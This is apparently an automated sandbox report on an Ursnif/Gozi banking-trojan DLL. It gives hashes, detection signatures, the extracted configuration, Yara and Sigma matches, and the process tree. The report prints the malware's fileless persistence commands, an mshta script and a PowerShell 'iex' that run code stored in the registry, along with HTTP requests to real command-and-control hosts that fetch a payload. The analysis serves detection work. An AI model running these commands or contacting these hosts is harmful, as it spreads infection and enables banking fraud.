Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Analysis ID: 351337
MD5: 4e62d8a29ba5805407ece642d63df461
SHA1: 320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256: ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
Tags: Gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 6524 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6360 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • SpeechRuntime.exe (PID: 5704 cmdline: C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding MD5: 91858001E25FE5FF6E1C650BB4F24AB0)
  • iexplore.exe (PID: 7068 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5124 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 608 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5872 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7048 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5872, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 7048

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dat | Avira URL Cloud: Label: phishing
Found malware configuration
Source: loaddll32.exe.6720.1.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at | Virustotal: Detection: 8%
Source: api3.lepini.at | Virustotal: Detection: 10%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D921B50: FindFirstFileExW, std::_Timevec::_Timevec, FindNextFileW
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
Source: global traffic | HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: unknown | HTTP traffic detected: POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 10 Feb 2021 14:15:41 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr | String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr | String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr | String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | String found in binary or memory: https://toldsend.com4

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: the same twelve memory sources listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E1C22: GetProcAddress, NtCreateSection, memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E1252: GetLastError, NtClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E1AD1: NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E23C5: NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8E21A4
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D8FF610
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6D92BA90
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Binary or memory string: OriginalFilenameGo.dllH& vs SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine | Classification label: mal100.troj.evad.winDLL@18/24@11/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{6E8265A0-F566-D0CB-EF82-F90493D63D78}
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SapiOneCoreServerStartingOrConnecting
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user~1\AppData\Local\Temp\~DF051F935A0216EDA8.TMP
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: unknown | Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
